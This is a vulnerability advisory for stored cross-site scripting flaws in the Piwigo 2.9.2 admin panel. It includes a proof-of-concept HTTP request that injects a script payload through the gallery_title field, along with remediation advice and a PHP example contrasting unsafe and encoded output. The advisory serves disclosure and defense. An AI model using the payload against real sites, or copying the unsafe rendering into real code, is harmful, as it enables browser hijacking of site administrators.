CVE-2017-17825 Multiple Stored XSS Vulnerabilities in Piwigo 2.9.2
23 Dec 2017

It was identified that the admin panel of the Piwigo application is vulnerable to multiple persistent (stored) cross-site scripting vulnerabilities. An attacker can exploit these vulnerabilities to hijack the client's browser along with the data stored in it.
Affected Version : <=2.9.2
Vulnerable Instances:
- /admin.php?page=batch_manager&mode=unit, [POST] tags-[] [CVE-2017-17825]
- /admin.php?page=configuration&section=main, [POST] gallery_title [CVE-2017-17826]
Proof of Concept:
Configuration component
REQUEST
POST /piwigo-2.9.2/piwigo/admin.php?page=configuration&section=main HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/piwigo-2.9.2/piwigo/admin.php?page=configuration
Content-Type: application/x-www-form-urlencoded
Content-Length: 310
Cookie: pwg_id=ljmb7f4h6rsrdkv9bgotsl9ja3;
Connection: close
Upgrade-Insecure-Requests: 1
gallery_title=`</title><script>alert(document.domain)</script>`&page_banner=test+banner&order_by%5B%5D=date_available+DESC&order_by%5B%5D=file+ASC&order_by%5B%5D=id+ASC&rate_anonymous=on&allow_user_registration=on&allow_user_customization=on&week_starts_on=monday&history_guest=on&log=on&mail_theme=clear&submit=
RESPONSE
Remediation:
As the application makes use of an MVC architecture, it is recommended to implement a middleware or centralized controller that applies context-specific output encoding, i.e. encodes user-supplied data according to the context it is rendered into (HTML body, attribute, JavaScript, URL), before printing it to the user.
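The following PHP snippet is an added illustration of the recommendation above; it is not Piwigo's own code or the vendor's patch. The helper names (esc, render_title_unsafe, render_title_safe, render_title_js_safe) are hypothetical, and only the gallery_title payload is taken from the proof of concept. It places the vulnerable rendering next to the hardened form and shows why the same value needs a different encoder when it lands in a script block instead of element text.

```php
<?php
// Added example, not Piwigo's code: a small context-specific output-encoding
// helper of the kind the remediation describes. Function names are hypothetical.

declare(strict_types=1);

/**
 * Encode a user-controlled string for a given output context.
 *   'html' : element text and quoted attribute values
 *   'js'   : a string literal inside a <script> block
 *   'url'  : a single query-string component
 */
function esc(string $value, string $context = 'html'): string
{
    switch ($context) {
        case 'html':
            // Encode & < > " ' as entities; ENT_SUBSTITUTE replaces invalid
            // UTF-8 instead of silently returning an empty string.
            return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
        case 'js':
            // The JSON_HEX_* flags turn < > & ' " into \uXXXX escapes, so the
            // literal can never terminate the surrounding <script> element.
            return json_encode(
                $value,
                JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
            );
        case 'url':
            return rawurlencode($value);
        default:
            throw new InvalidArgumentException("unknown output context: $context");
    }
}

// Vulnerable form: the stored setting is interpolated verbatim into the page,
// so a value containing "</title><script>..." breaks out of the title element.
function render_title_unsafe(string $galleryTitle): string
{
    return "<title>{$galleryTitle}</title>";
}

// Hardened form: the same value is encoded for the HTML context at the point
// of output; "</title>" becomes "&lt;/title&gt;" and stays inert text.
function render_title_safe(string $galleryTitle): string
{
    return '<title>' . esc($galleryTitle, 'html') . '</title>';
}

// Hardened form for the case where the setting is handed to inline JavaScript.
// HTML entity encoding would be the wrong tool here: inside <script> the
// browser does not decode entities, so the value is emitted as a JS literal.
function render_title_js_safe(string $galleryTitle): string
{
    return '<script>var galleryTitle = ' . esc($galleryTitle, 'js') . ';</script>';
}

// The gallery_title payload from the advisory's proof of concept.
$payload = '</title><script>alert(document.domain)</script>';

echo "Unsafe : " . render_title_unsafe($payload) . PHP_EOL;
echo "HTML   : " . render_title_safe($payload) . PHP_EOL;
echo "JS     : " . render_title_js_safe($payload) . PHP_EOL;
```

Running the script shows the unsafe output containing a live script element, while the two hardened outputs keep the payload as harmless text. In a centralized controller or template layer the practical step is to make the 'html' encoder the default for every interpolated variable and to require an explicit context name whenever a value is placed into script or URL positions; a single `esc()` that is selected by context is easier to audit than ad-hoc calls scattered across views.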
Vendor Patches:
The patch released by vendor for this issue can be found here